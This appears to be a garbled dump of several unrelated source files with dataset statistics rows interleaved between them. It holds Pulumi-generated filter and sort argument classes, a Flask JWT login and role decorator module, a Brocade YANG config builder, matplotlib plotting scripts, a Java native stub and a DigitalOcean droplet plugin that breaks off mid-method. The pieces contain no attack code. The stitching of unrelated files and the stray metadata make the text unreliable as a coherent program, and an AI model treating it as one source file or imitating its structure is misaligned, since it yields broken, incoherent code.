    @property
    @pulumi.getter
    def key(self) -> str:
        """Filter the sizes by this key. This may be one of `code`, `name`, `country`, `default`."""
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """Only retrieves region which keys has value that matches one of the values provided here."""
        return pulumi.get(self, "values")
    @values.setter
    def values(self, value: Sequence[str]):
        pulumi.set(self, "values", value)
    @property
    @pulumi.getter
    def all(self) -> Optional[bool]:
        return pulumi.get(self, "all")
    @all.setter
    def all(self, value: Optional[bool]):
        pulumi.set(self, "all", value)
    @property
    @pulumi.getter(name="matchBy")
    def match_by(self) -> Optional[str]:
        return pulumi.get(self, "match_by")
    @match_by.setter
    def match_by(self, value: Optional[str]):
        pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetRegionSortArgs:
    def __init__(__self__, *,
                 key: str,
                 direction: Optional[str] = None):
        """
        :param str key: Sort the sizes by this key. This may be one of `code`,`name`.
        :param str direction: The sort direction. This may be either `asc` or `desc`.
        """
        pulumi.set(__self__, "key", key)
        # Direction is optional; skip storing it when absent.
        if direction is None:
            return
        pulumi.set(__self__, "direction", direction)
    @property
    @pulumi.getter
    def key(self) -> str:
        """Sort the sizes by this key. This may be one of `code`,`name`."""
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def direction(self) -> Optional[str]:
        """The sort direction. This may be either `asc` or `desc`."""
        return pulumi.get(self, "direction")
    @direction.setter
    def direction(self, value: Optional[str]):
        pulumi.set(self, "direction", value)
@pulumi.input_type
class GetTemplateFilterArgs:
    def __init__(__self__, *,
                 key: str,
                 values: Sequence[str],
                 all: Optional[bool] = None,
                 match_by: Optional[str] = None):
        """
        :param str key: Filter the sizes by this key. This may be one of `id`,`name`,`version`,`label`.
        :param Sequence[str] values: Only retrieves the template which keys has value that matches
               one of the values provided here.
        """
        pulumi.set(__self__, "key", key)
        pulumi.set(__self__, "values", values)
        # Optional matching modifiers are only stored when supplied.
        for prop, arg in (("all", all), ("match_by", match_by)):
            if arg is not None:
                pulumi.set(__self__, prop, arg)
    @property
    @pulumi.getter
    def key(self) -> str:
        """Filter the sizes by this key. This may be one of `id`,`name`,`version`,`label`."""
        return pulumi.get(self, "key")
    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)
    @property
    @pulumi.getter
    def values(self) -> Sequence[str]:
        """
        Only retrieves the template which keys has value that matches
        one of the values provided here.
        """
        return pulumi.get(self, "values")
    @values.setter
    def values(self, value: Sequence[str]):
        pulumi.set(self, "values", value)
    @property
    @pulumi.getter
    def all(self) -> Optional[bool]:
        return pulumi.get(self, "all")
    @all.setter
    def all(self, value: Optional[bool]):
        pulumi.set(self, "all", value)
    @property
    @pulumi.getter(name="matchBy")
    def match_by(self) -> Optional[str]:
        return pulumi.get(self, "match_by")
    @match_by.setter
    def match_by(self, value: Optional[str]):
        pulumi.set(self, "match_by", value)
@pulumi.input_type
class GetTemplateSortArgs:
    def __init__(self, *,
                 key: str,
                 direction: Optional[str] = None):
        """
        :param str key: Sort the sizes by this key. This may be one of `id`,`name`,`version`,`label`.
        :param str direction: The sort direction. This may be either `asc` or `desc`.
        """
        pulumi.set(self, "key", key)
        if direction is not None:
            pulumi.set(self, "direction", direction)

    @property
    @pulumi.getter
    def key(self) -> str:
        """Sort the sizes by this key. This may be one of `id`,`name`,`version`,`label`."""
        return pulumi.get(self, "key")

    @key.setter
    def key(self, value: str):
        pulumi.set(self, "key", value)

    @property
    @pulumi.getter
    def direction(self) -> Optional[str]:
        """The sort direction. This may be either `asc` or `desc`."""
        return pulumi.get(self, "direction")

    @direction.setter
    def direction(self, value: Optional[str]):
        pulumi.set(self, "direction", value)
| 31.587002
| 134
| 0.593748
| 3,610
| 30,134
| 4.813573
| 0.044875
| 0.083559
| 0.083789
| 0.06123
| 0.870519
| 0.836393
| 0.80854
| 0.781435
| 0.752546
| 0.732693
| 0
| 0.000046
| 0.279219
| 30,134
| 953
| 135
| 31.620147
| 0.8
| 0.198878
| 0
| 0.794745
| 1
| 0
| 0.070383
| 0.017728
| 0
| 0
| 0
| 0
| 0
| 1
| 0.208539
| false
| 0
| 0.00821
| 0.027915
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a6044c0856b430dfa042f2d93b2bd922bf51a509
| 2,679
|
py
|
Python
|
resources/auth.py
|
mikenthiwa/Ride-My-Way
|
2ad702903f971e0cd474d9e7339174bbe37c47d8
|
[
"MIT"
] | null | null | null |
resources/auth.py
|
mikenthiwa/Ride-My-Way
|
2ad702903f971e0cd474d9e7339174bbe37c47d8
|
[
"MIT"
] | 2
|
2018-06-12T15:29:44.000Z
|
2018-07-04T09:59:12.000Z
|
resources/auth.py
|
mikenthiwa/Ride-My-Way
|
2ad702903f971e0cd474d9e7339174bbe37c47d8
|
[
"MIT"
] | 4
|
2018-06-24T19:05:33.000Z
|
2018-10-17T15:05:43.000Z
|
from flask import jsonify, request, make_response
from functools import wraps
import jwt
from instance.config import Config
def token_required(f):
    """Checks for authenticated users with valid token in the header.

    Returns a 401 JSON response when the x-access-token header is missing or
    does not decode with the application secret; otherwise calls the wrapped
    view unchanged.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        """validate token provided"""
        # .get() replaces the membership-test-then-index pair on the headers.
        token = request.headers.get('x-access-token')
        if token is None:
            return make_response(jsonify({"message": "Please sign-up and login"}), 401)
        try:
            # Decoded claims were assigned but never used here; only validity matters.
            jwt.decode(token, Config.SECRET)
        except Exception:
            # Was a bare `except:` — narrowed so SystemExit/KeyboardInterrupt propagate.
            # NOTE(review): jwt.decode is called without `algorithms=`; PyJWT >= 2.0
            # requires that argument — confirm the pinned PyJWT version before upgrading.
            return make_response(jsonify({
                "message": "kindly provide a valid token in the header"}), 401)
        return f(*args, **kwargs)
    return decorated
def driver_required(f):
    """Checks for authenticated drivers with valid token in the header.

    Rejects with 401 when the token is missing or invalid, or when the token's
    `is_driver` claim is falsy. (Original docstring said "admins" — copy-paste.)
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        """validate token provided and ensures the user is a driver"""
        token = request.headers.get('x-access-token')
        if token is None:
            return make_response(jsonify({
                "message": "Please sign-up and login"}), 401)
        try:
            data = jwt.decode(token, Config.SECRET)
            driver = data['is_driver']
        except Exception:
            # Was a bare `except:`. A missing `is_driver` claim (KeyError) is
            # still treated as an invalid token, exactly as before.
            return make_response(jsonify({
                "message": "kindly provide a valid token in the header"}), 401)
        if not driver:
            return make_response(jsonify({
                "message": "you are not authorized to perform this function as a non-driver user"}), 401)
        return f(*args, **kwargs)
    return decorated
def admin_required(f):
    """Checks for authenticated admins with valid token in the header.

    Rejects with 401 when the token is missing or invalid, or when the token's
    `is_admin` claim is falsy.
    """
    @wraps(f)
    def decorated(*args, **kwargs):
        """validate token provided and ensures the user is an admin"""
        token = request.headers.get('x-access-token')
        if token is None:
            return make_response(jsonify({"message": "Please sign-up and login"}), 401)
        try:
            data = jwt.decode(token, Config.SECRET)
            admin = data['is_admin']
        except Exception:
            # Was a bare `except:`. A missing `is_admin` claim (KeyError) is
            # still treated as an invalid token, exactly as before.
            return make_response(jsonify({"message": "kindly provide a valid token in the header"}), 401)
        if not admin:
            return make_response(
                jsonify({"message": "you are not authorized to perform this function as a non-admin user"}), 401)
        return f(*args, **kwargs)
    return decorated
| 29.766667
| 113
| 0.597238
| 327
| 2,679
| 4.850153
| 0.207951
| 0.068096
| 0.090794
| 0.126103
| 0.883985
| 0.864439
| 0.864439
| 0.864439
| 0.791299
| 0.791299
| 0
| 0.012759
| 0.297872
| 2,679
| 90
| 114
| 29.766667
| 0.830409
| 0.121314
| 0
| 0.719298
| 0
| 0
| 0.210843
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.070175
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6625da32d7d42a2a63cbc4057cea2b3f376aaa2
| 48
|
py
|
Python
|
atmcraft/model/__init__.py
|
zzzeek/pycon2014_atmcraft
|
588a00d0cdfe7be272e557d1dc3d99296538f401
|
[
"MIT"
] | null | null | null |
atmcraft/model/__init__.py
|
zzzeek/pycon2014_atmcraft
|
588a00d0cdfe7be272e557d1dc3d99296538f401
|
[
"MIT"
] | null | null | null |
atmcraft/model/__init__.py
|
zzzeek/pycon2014_atmcraft
|
588a00d0cdfe7be272e557d1dc3d99296538f401
|
[
"MIT"
] | null | null | null |
from . import meta
from . import account, client
| 24
| 29
| 0.770833
| 7
| 48
| 5.285714
| 0.714286
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 48
| 2
| 29
| 24
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
473283ac38608b80b811b63d411f6bad07ef689c
| 19,162
|
py
|
Python
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_cee_map.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 12
|
2015-09-21T23:56:09.000Z
|
2018-03-30T04:35:32.000Z
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_cee_map.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 10
|
2016-09-15T19:03:27.000Z
|
2017-07-17T23:38:01.000Z
|
pynos/versions/ver_7/ver_7_1_0/yang/brocade_cee_map.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 6
|
2015-08-14T08:05:23.000Z
|
2022-02-03T15:33:54.000Z
|
#!/usr/bin/env python
import xml.etree.ElementTree as ET
class brocade_cee_map(object):
    """Auto generated class.

    Builds NETCONF-style <config> XML payloads for the brocade-cee-map YANG
    module and hands each one to a callback (normally the device connection)
    for delivery. Every public method corresponds to one configurable leaf.

    Fix: in the generated original every method was defined twice; the second
    identical copy silently shadowed the first. The duplicates are removed and
    the repeated root/namespace boilerplate is factored into private helpers.
    """

    def __init__(self, **kwargs):
        # `callback` receives the finished ElementTree `config` element.
        self._callback = kwargs.pop('callback')

    def _cee_map_config(self):
        """Return (config_root, cee_map_element) with the module namespace set."""
        config = ET.Element("config")
        cee_map = ET.SubElement(config, "cee-map", xmlns="urn:brocade.com:mgmt:brocade-cee-map")
        return config, cee_map

    def _dispatch(self, config, kwargs):
        """Send `config` through the per-call callback, or the default one."""
        callback = kwargs.pop('callback', self._callback)
        return callback(config)

    def cee_map_name(self, **kwargs):
        """Auto Generated Code"""
        config, cee_map = self._cee_map_config()
        name = ET.SubElement(cee_map, "name")
        name.text = kwargs.pop('name')
        return self._dispatch(config, kwargs)

    def cee_map_precedence(self, **kwargs):
        """Auto Generated Code"""
        config, cee_map = self._cee_map_config()
        name_key = ET.SubElement(cee_map, "name")
        name_key.text = kwargs.pop('name')
        precedence = ET.SubElement(cee_map, "precedence")
        precedence.text = kwargs.pop('precedence')
        return self._dispatch(config, kwargs)

    def cee_map_priority_group_table_PGID(self, **kwargs):
        """Auto Generated Code"""
        config, cee_map = self._cee_map_config()
        name_key = ET.SubElement(cee_map, "name")
        name_key.text = kwargs.pop('name')
        priority_group_table = ET.SubElement(cee_map, "priority-group-table")
        PGID = ET.SubElement(priority_group_table, "PGID")
        PGID.text = kwargs.pop('PGID')
        return self._dispatch(config, kwargs)

    def cee_map_priority_group_table_weight(self, **kwargs):
        """Auto Generated Code"""
        config, cee_map = self._cee_map_config()
        name_key = ET.SubElement(cee_map, "name")
        name_key.text = kwargs.pop('name')
        priority_group_table = ET.SubElement(cee_map, "priority-group-table")
        PGID_key = ET.SubElement(priority_group_table, "PGID")
        PGID_key.text = kwargs.pop('PGID')
        weight = ET.SubElement(priority_group_table, "weight")
        weight.text = kwargs.pop('weight')
        return self._dispatch(config, kwargs)

    def cee_map_priority_group_table_pfc(self, **kwargs):
        """Auto Generated Code"""
        config, cee_map = self._cee_map_config()
        name_key = ET.SubElement(cee_map, "name")
        name_key.text = kwargs.pop('name')
        priority_group_table = ET.SubElement(cee_map, "priority-group-table")
        PGID_key = ET.SubElement(priority_group_table, "PGID")
        PGID_key.text = kwargs.pop('PGID')
        pfc = ET.SubElement(priority_group_table, "pfc")
        pfc.text = kwargs.pop('pfc')
        return self._dispatch(config, kwargs)

    def _priority_table_map(self, tag, arg, kwargs):
        """Shared body of the cee_map_priority_table_map_cos<N>_pgid methods."""
        config, cee_map = self._cee_map_config()
        name_key = ET.SubElement(cee_map, "name")
        name_key.text = kwargs.pop('name')
        priority_table = ET.SubElement(cee_map, "priority-table")
        node = ET.SubElement(priority_table, tag)
        node.text = kwargs.pop(arg)
        return self._dispatch(config, kwargs)

    def cee_map_priority_table_map_cos0_pgid(self, **kwargs):
        """Auto Generated Code"""
        return self._priority_table_map("map-cos0-pgid", "map_cos0_pgid", kwargs)

    def cee_map_priority_table_map_cos1_pgid(self, **kwargs):
        """Auto Generated Code"""
        return self._priority_table_map("map-cos1-pgid", "map_cos1_pgid", kwargs)

    def cee_map_priority_table_map_cos2_pgid(self, **kwargs):
        """Auto Generated Code"""
        return self._priority_table_map("map-cos2-pgid", "map_cos2_pgid", kwargs)

    def cee_map_priority_table_map_cos3_pgid(self, **kwargs):
        """Auto Generated Code"""
        return self._priority_table_map("map-cos3-pgid", "map_cos3_pgid", kwargs)

    def cee_map_priority_table_map_cos4_pgid(self, **kwargs):
        """Auto Generated Code"""
        return self._priority_table_map("map-cos4-pgid", "map_cos4_pgid", kwargs)

    def cee_map_priority_table_map_cos5_pgid(self, **kwargs):
        """Auto Generated Code"""
        return self._priority_table_map("map-cos5-pgid", "map_cos5_pgid", kwargs)

    def cee_map_priority_table_map_cos6_pgid(self, **kwargs):
        """Auto Generated Code"""
        return self._priority_table_map("map-cos6-pgid", "map_cos6_pgid", kwargs)

    def cee_map_priority_table_map_cos7_pgid(self, **kwargs):
        """Auto Generated Code"""
        return self._priority_table_map("map-cos7-pgid", "map_cos7_pgid", kwargs)

    def cee_map_remap_fabric_priority_fabric_remapped_priority(self, **kwargs):
        """Auto Generated Code"""
        config, cee_map = self._cee_map_config()
        name_key = ET.SubElement(cee_map, "name")
        name_key.text = kwargs.pop('name')
        remap = ET.SubElement(cee_map, "remap")
        fabric_priority = ET.SubElement(remap, "fabric-priority")
        fabric_remapped_priority = ET.SubElement(fabric_priority, "fabric-remapped-priority")
        fabric_remapped_priority.text = kwargs.pop('fabric_remapped_priority')
        return self._dispatch(config, kwargs)

    def cee_map_remap_lossless_priority_lossless_remapped_priority(self, **kwargs):
        """Auto Generated Code"""
        config, cee_map = self._cee_map_config()
        name_key = ET.SubElement(cee_map, "name")
        name_key.text = kwargs.pop('name')
        remap = ET.SubElement(cee_map, "remap")
        lossless_priority = ET.SubElement(remap, "lossless-priority")
        lossless_remapped_priority = ET.SubElement(lossless_priority, "lossless-remapped-priority")
        lossless_remapped_priority.text = kwargs.pop('lossless_remapped_priority')
        return self._dispatch(config, kwargs)
| 44.050575
| 99
| 0.640486
| 2,395
| 19,162
| 4.897704
| 0.022547
| 0.09156
| 0.052856
| 0.089003
| 0.988747
| 0.988747
| 0.988747
| 0.988747
| 0.988747
| 0.988747
| 0
| 0.005393
| 0.225916
| 19,162
| 435
| 100
| 44.050575
| 0.785411
| 0.047855
| 0
| 0.987013
| 1
| 0
| 0.172803
| 0.070757
| 0
| 0
| 0
| 0
| 0
| 1
| 0.100649
| false
| 0
| 0.003247
| 0
| 0.204545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5b566eccead40e43a943159762dfe8964dd6a3ef
| 5,261
|
py
|
Python
|
w4_center_selection_problem.py
|
RadarSun/Advanced-algorithm
|
9acce0a855b178823ceb202b9beb617db4dce37b
|
[
"Apache-2.0"
] | 4
|
2021-09-06T08:25:09.000Z
|
2021-10-15T13:03:03.000Z
|
w4_center_selection_problem.py
|
RadarSun/SUSTech-Advanced-algorithm
|
9acce0a855b178823ceb202b9beb617db4dce37b
|
[
"Apache-2.0"
] | null | null | null |
w4_center_selection_problem.py
|
RadarSun/SUSTech-Advanced-algorithm
|
9acce0a855b178823ceb202b9beb617db4dce37b
|
[
"Apache-2.0"
] | null | null | null |
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [3,8]
# y_c = [3,8]
# x_s = [4,5,7]
# y_s = [4,5,7]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,13))
# plt.yticks(range(0,13))
# # plt.title('r(C) = ')
# plt.grid()
# plt.show()
# # use for example1
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [2,6]
# y_c = [2,6]
# x_s = [1,3,5]
# y_s = [1,3,5]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,8))
# plt.yticks(range(0,8))
# # plt.title('r(C) = ')
# plt.grid()
# plt.show()
# # example2.1
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [2,1,11]
# y_c = [2,11,1]
# x_s = [1,2,2,3, 1,2,10,11]
# y_s = [2,3,1,2, 10,11,1,2]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,13))
# plt.yticks(range(0,13))
# plt.grid()
# plt.show()
# # example 2.2
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [1,2,11]
# y_c = [2,11,1]
# x_s = [2,2,2,3, 1,1,10,11]
# y_s = [2,3,1,2, 10,11,1,2]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,13))
# plt.yticks(range(0,13))
# plt.grid()
# plt.show()
# # use for old example1
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [4,4]
# y_c = [5,3-3**0.5]
# x_s = [4,3,5]
# y_s = [6,3,3]
# # x_s = [4,3,5,4,4]
# # y_s = [5,3,3,6,3-3**0.5]
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,9))
# plt.yticks(range(0,9))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example1.0
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_s = [1,1,3,3, 2, 6,6,8,8, 7]
# y_s = [1,3,1,3, 2, 6,8,6,8, 7]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example1.1 optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [2,7]
# y_c = [2,7]
# x_s = [1,1,3,3, 6,6,8,8]
# y_s = [1,3,1,3, 6,8,6,8]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example1.2 optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [2,8]
# y_c = [2,8]
# x_s = [1,1,3,3, 6,6,8,7]
# y_s = [1,3,1,3, 6,8,6,7]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example1.3 optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [1,8]
# y_c = [3,8]
# x_s = [1,2,3,3, 6,6,8,7]
# y_s = [1,2,1,3, 6,8,6,7]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example2.0 always the optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_s = [3,4,6,7]
# y_s = [3,4,6,7]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example2.1 always the optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [3,7]
# y_c = [3,7]
# x_s = [4,6]
# y_s = [4,6]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# # example2.2 always the optimal one
# import numpy as np
# import matplotlib.pyplot as plt
# plt.figure(figsize=(8, 8))
# x_c = [4,7]
# y_c = [4,7]
# x_s = [3,6]
# y_s = [3,6]
# plt.scatter(x_s,y_s,s=300,c='blue')
# plt.scatter(x_c,y_c,s=300,c='red')
# plt.xticks(range(0,10))
# plt.yticks(range(0,10))
# plt.tick_params(labelsize=30)
# plt.grid()
# plt.show()
# examples 3.0 - 3.2: plot the point sets (sites in blue, chosen centers in red).
# The original repeated the imports and the full plotting boilerplate for every
# example; the imports are now done once and the boilerplate lives in a helper.
import numpy as np  # noqa: F401  (kept: imported by the original script, though unused)
import matplotlib.pyplot as plt


def _show_example(x_s, y_s, x_c=None, y_c=None):
    """Draw one center-selection example: sites in blue, optional centers in red."""
    plt.figure(figsize=(8, 8))
    plt.scatter(x_s, y_s, s=300, c='blue')
    if x_c is not None:
        plt.scatter(x_c, y_c, s=300, c='red')
    plt.xticks(range(0, 11))
    plt.yticks(range(0, 11))
    plt.tick_params(labelsize=30)
    plt.grid()
    plt.show()


# example3.0: the full site set, no centers chosen yet.
_show_example([2, 2, 2, 3, 1, 4, 5, 6, 9, 8, 9],
              [2, 1, 3, 2, 2, 5, 5, 5, 9, 9, 8])
# example3.1
_show_example([2, 2, 3, 1, 4, 6, 8, 9],
              [2, 3, 2, 2, 5, 5, 9, 8],
              x_c=[5, 9, 2], y_c=[5, 9, 1])
# example3.2
_show_example([2, 2, 3, 1, 4, 6, 8, 9],
              [1, 3, 2, 2, 5, 5, 9, 8],
              x_c=[5, 9, 2], y_c=[5, 9, 2])
| 22.774892
| 37
| 0.615852
| 1,175
| 5,261
| 2.654468
| 0.044255
| 0.019878
| 0.095223
| 0.072139
| 0.950625
| 0.94261
| 0.93235
| 0.923052
| 0.899647
| 0.886502
| 0
| 0.113952
| 0.137616
| 5,261
| 231
| 38
| 22.774892
| 0.573507
| 0.747386
| 0
| 0.846154
| 0
| 0
| 0.015845
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.153846
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5bed64824aa31dad54883a9ace71b27403f8f09a
| 361
|
py
|
Python
|
pava/implementation/natives/sun/java2d/loops/DrawLine.py
|
laffra/pava
|
54d10cf7f8def2f96e254c0356623d08f221536f
|
[
"MIT"
] | 4
|
2017-03-30T16:51:16.000Z
|
2020-10-05T12:25:47.000Z
|
pava/implementation/natives/sun/java2d/loops/DrawLine.py
|
laffra/pava
|
54d10cf7f8def2f96e254c0356623d08f221536f
|
[
"MIT"
] | null | null | null |
pava/implementation/natives/sun/java2d/loops/DrawLine.py
|
laffra/pava
|
54d10cf7f8def2f96e254c0356623d08f221536f
|
[
"MIT"
] | null | null | null |
def add_native_methods(clazz):
    """Attach stub implementations of the native DrawLine methods to *clazz*.

    Each stub simply raises NotImplementedError when invoked.
    """
    def _draw_line_stub(a0, a1, a2, a3, a4, a5, a6):
        raise NotImplementedError()

    # Give the stub the mangled JNI-style name it is published under.
    _draw_line_stub.__name__ = (
        "DrawLine__sun_java2d_SunGraphics2D__sun_java2d_SurfaceData__int__int__int__int__"
    )
    clazz.DrawLine__sun_java2d_SunGraphics2D__sun_java2d_SurfaceData__int__int__int__int__ = _draw_line_stub
| 51.571429
| 173
| 0.864266
| 49
| 361
| 5.22449
| 0.408163
| 0.210938
| 0.210938
| 0.351563
| 0.726563
| 0.726563
| 0.726563
| 0.726563
| 0.726563
| 0.726563
| 0
| 0.04878
| 0.091413
| 361
| 6
| 174
| 60.166667
| 0.731707
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5bf0c275b006c3f1cb4ac41a4e7b1e6d1162e315
| 11,621
|
py
|
Python
|
models/action.py
|
z1pti3/jimiPlugin-digitalocean
|
bef325ba3393dc77ae0b0b61438c150f24c5688d
|
[
"Apache-2.0"
] | 1
|
2021-07-26T15:02:26.000Z
|
2021-07-26T15:02:26.000Z
|
models/action.py
|
z1pti3/jimiPlugin-digitalocean
|
bef325ba3393dc77ae0b0b61438c150f24c5688d
|
[
"Apache-2.0"
] | 2
|
2021-06-19T14:18:07.000Z
|
2021-11-21T12:13:42.000Z
|
models/action.py
|
z1pti3/jimiPlugin-digitalocean
|
bef325ba3393dc77ae0b0b61438c150f24c5688d
|
[
"Apache-2.0"
] | null | null | null |
from core.models import action
from core import auth, db, helpers
from plugins.digitalocean.includes import digitalocean
class _digitaloceanListDroplets(action._action):
    """Action that lists all droplets on the DigitalOcean account."""

    # Stored encrypted ("ENC ..." prefix) by setAttribute.
    apiToken = str()

    def run(self, data, persistentData, actionResult):
        """Populate actionResult with the droplet list, or a failure code."""
        apiToken = auth.getPasswordFromENC(self.apiToken)
        result = digitalocean._digitalocean(apiToken).listDroplets()
        if result:
            actionResult["result"] = True
            actionResult["rc"] = 0
            actionResult["droplets"] = result
        else:
            actionResult["result"] = False
            actionResult["rc"] = 404
            # Bug fix: the original message said "virustotal API" — copy-pasted
            # from another plugin; this action talks to the DigitalOcean API.
            actionResult["msg"] = "Failed to get a valid response from digitalocean API"
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt apiToken on write (ACL-checked); defer other attributes to the base class."""
        if attr == "apiToken" and not value.startswith("ENC "):
            if db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
                self.apiToken = "ENC {0}".format(auth.getENCFromPassword(value))
                return True
            return False
        return super(_digitaloceanListDroplets, self).setAttribute(attr, value, sessionData=sessionData)
class _digitaloceanGetDropletByName(action._action):
    """Action that looks a droplet up by its name."""
    apiToken = str()
    dropletName = str()

    def run(self, data, persistentData, actionResult):
        """Resolve the droplet name template and fetch the matching droplet."""
        token = auth.getPasswordFromENC(self.apiToken)
        name = helpers.evalString(self.dropletName, {"data": data})
        lookup = digitalocean._digitalocean(token).listDroplets(name=name)
        if not lookup:
            actionResult["result"] = False
            actionResult["rc"] = 500
            actionResult["msg"] = "Unable to get droplet by name, it likely does not exist"
        elif "error" in lookup:
            # The API surfaced a structured error; pass it straight through.
            actionResult["result"] = False
            actionResult["msg"] = lookup["msg"]
            actionResult["rc"] = lookup["error"]
        else:
            actionResult["result"] = True
            actionResult["rc"] = 0
            actionResult["droplet"] = lookup
        return actionResult

    def setAttribute(self, attr, value, sessionData=None):
        """Encrypt a plain-text apiToken before storing it; defer everything else."""
        if attr != "apiToken" or value.startswith("ENC "):
            return super(_digitaloceanGetDropletByName, self).setAttribute(attr, value, sessionData=sessionData)
        if not db.fieldACLAccess(sessionData, self.acl, attr, accessType="write"):
            return False
